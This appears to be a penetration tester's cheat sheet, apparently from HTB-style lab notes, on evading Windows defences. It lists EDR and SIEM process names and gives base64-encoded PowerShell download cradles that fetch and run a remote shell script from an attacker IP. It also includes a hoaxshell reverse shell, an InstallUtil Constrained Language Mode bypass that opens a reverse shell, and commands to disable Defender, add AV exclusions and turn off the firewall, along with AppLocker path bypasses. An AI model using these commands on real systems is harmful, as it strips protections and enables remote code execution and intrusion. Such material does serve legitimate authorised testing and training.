Protections Bypass

Process that indicate security solution installed on system

EDR / (AV)

• CrowdStrike Falcon: csagent.exe, CSFalconService.exe

• Microsoft Defender: MsMpEng.exe, MSASCui.exe

• Elastic Security: elastic-agent.exe, elastic-endpoint.exe

• Carbon Black: cb.exe, CbDefense.exe

• SentinelOne: SentinelAgent.exe

• CylancePROTECT: CylanceSvc.exe

• Symantec: ccSvcHst.exe, Rtvscan.exe

• Trend Micro: TmCCSF.exe

• Kaspersky: avp.exe

SIEM

• Splunk: splunkd.exe

• IBM QRadar: qradar.exe

• Tanium: TaniumClient.exe

Another tools

• Sysmon: sysmon.exe

• Osquery: osqueryd.exe

• Wazuh: wazuh-agent.exe

Antimalware Scan Interface (AMSI)

If you are authenticate on evil-winrm you can use Bypass-4MSI module.

#Check if AMSI is enabled
reg query "HKLM\\SOFTWARE\\Microsoft\\AMSI"

Bypass execution Scripts

Ofuscate the script by modifing the function names, removing the comments and delete the examples section <# Remove Everything here #>

#Encode payload on Linux
echo 'IEX(New-Object Net.WebClient).downloadString("http://10.10.14.3/shell.ps1")' | iconv -t UTF-16LE | base64 -w0;echo

#Encode payload on Windows
PS C:\> $str = 'IEX ((new-object net.webclient).downloadstring("http://nickelviper.com/a"))'
PS C:\> [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))

#Execute the payload
PS C:\> powershell.exe -enc SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANAAuADMALwBzAGgAZQBsAGwALgBwAHMAMQAiACkACgA=

hoaxshell

A Windows reverse shell payload generator and handler that abuses the http(s) protocol to establish a beacon-like reverse shell.

As of 2022-10-18, hoaxshell is detected by AMSI (malware-encyclopedia). You need to obfuscate the generated payload in order to use. You could use AMSITrigger to detect the malicious string and fix it.

GitHub - t3l3machus/hoaxshell: An unconventional Windows reverse shell, currently undetected by Microsoft Defender and various other AV solutions, solely based on http(s) traffic.GitHub

Hunting for malicious strings using AmsiTrigger // RythmStick

Additional Techniques

AMSI Bypass MethodsPentest Laboratories

---

Constrained Language Mode

GitHub - padovah4ck/PSByPassCLM: Bypass for PowerShell Constrained Language ModeGitHub

#Get LanguageMode
$executionContext.SessionState.LanguageMode

#Bypass via PSBypassCLM
C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe /logfile= /LogToConsole=true /revshell=true /rhost=10.10.14.9 /rport=443 /U C:\\Users\\amanda\\Documents\\PsBypassCLM.exe

#Bypass by using Powershell Version2
Powershell -version 2

Windows Defender

#Windows Defender Status
PS C:\\> Get-MpComputerStatus

#Disable Security Protection
PS C:\\> Set-MpPreference -DisableRealtimeMonitoring $true -DisableScriptScanning $true -DisableBehaviorMonitoring $true -DisableIOAVProtection $true -DisableIntrusionPreventionSystem $true

#Set exclusion AV Rules
Add-MpPreference -ExclusionPath "c:\temp" -ExclusionProcess "c:\temp\yourstuffs.exe"

Firewall

#Verify the status
netsh advfirewall show allprofiles
Get-NetFirewallProfile | Select-Object Name, Enabled

#List Rules
netsh advfirewall firewall show rule name=all

#Disable Firewall
Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False
netsh advfirewall set allprofiles state off

#Open port (Inbound outbound)
netsh advfirewall firewall add rule name="Allow 1234" protocol=TCP dir=in localport=1234 action=allow
netsh advfirewall firewall add rule name="Allow 1234" protocol=TCP dir=out localport=1234 action=allow
netsh advfirewall firewall add rule name="Allw range ports" protocol=TCP dir=in localport=8000-9000 action=allow

Applocker

Get-ApplockerPolicy -Effective -xml

Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections

$a = Get-ApplockerPolicy -effective
$a.rulecollections

How to bypass

Poorly written rules could also be bypassed

• For example, <FilePathCondition Path="%OSDRIVE%*\\allowed*"/>, you can create a folder called allowed anywhere and it will be allowed.

• Organizations also often focus on blocking the %System32%\\WindowsPowerShell\\v1.0\\powershell.exe executable, but forget about the other PowerShell executable locations such as %SystemRoot%\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe or PowerShell_ISE.exe.

Bypass via paths

• Useful Writable folders to bypass AppLocker Policy: If AppLocker is allowing to execute anything inside C:\\Windows\\System32 or C:\\Windows there are writable folders you can use to bypass this.

C:\Windows\Tasks 
C:\Windows\Temp 
C:\windows\tracing
C:\Windows\Registration\CRMLog
C:\Windows\System32\FxsTmp
C:\Windows\System32\com\dmp
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\PRINTERS
C:\Windows\System32\spool\SERVERS
C:\Windows\System32\spool\drivers\color
C:\Windows\System32\Tasks\Microsoft\Windows\SyncCenter
C:\Windows\System32\Tasks_Migrated (after peforming a version upgrade of Windows 10)
C:\Windows\SysWOW64\FxsTmp
C:\Windows\SysWOW64\com\dmp
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\SyncCenter
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\PLA\System

User Access Control List

Note that if you have graphical access to the victim, UAC bypass is straight forward as you can simply click on "Yes" when the UAC prompt appears

ConsentPromptBehaviorAdmin levels

Value	Meaning
0x00000000	This option allows the Consent Admin to perform an operation that requires elevation without consent or credentials.
0x00000001	This option prompts the Consent Admin to enter his or her user name and password (or another valid admin) when an operation requires elevation of privilege. This operation occurs on the secure desktop.
0x00000002	This option prompts the administrator in Admin Approval Mode to select either "Permit" or "Deny" an operation that requires elevation of privilege. If the Consent Admin selects Permit, the operation will continue with the highest available privilege. "Prompt for consent" removes the inconvenience of requiring that users enter their name and password to perform a privileged task. This operation occurs on the secure desktop.
0x00000003	This option prompts the Consent Admin to enter his or her user name and password (or that of another valid admin) when an operation requires elevation of privilege.
0x00000004	This prompts the administrator in Admin Approval Mode to select either "Permit" or "Deny" an operation that requires elevation of privilege. If the Consent Admin selects Permit, the operation will continue with the highest available privilege. "Prompt for consent" removes the inconvenience of requiring that users enter their name and password to perform a privileged task.
0x00000005	This option is the default. It is used to prompt the administrator in Admin Approval Mode to select either "Permit" or "Deny" for an operation that requires elevation of privilege for any non-Windows binaries. If the Consent Admin selects Permit, the operation will continue with the highest available privilege. This operation will happen on the secure desktop.<8>

Project maintains a list of UAC bypasses

https://github.com/hfiref0x/UACME

#Confirming UAC is Enabled
C:\\htb> REG QUERY HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\ /v EnableLUA
#Checking the UAC level
C:\\htb> REG QUERY HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\ /v ConsentPromptBehaviorAdmin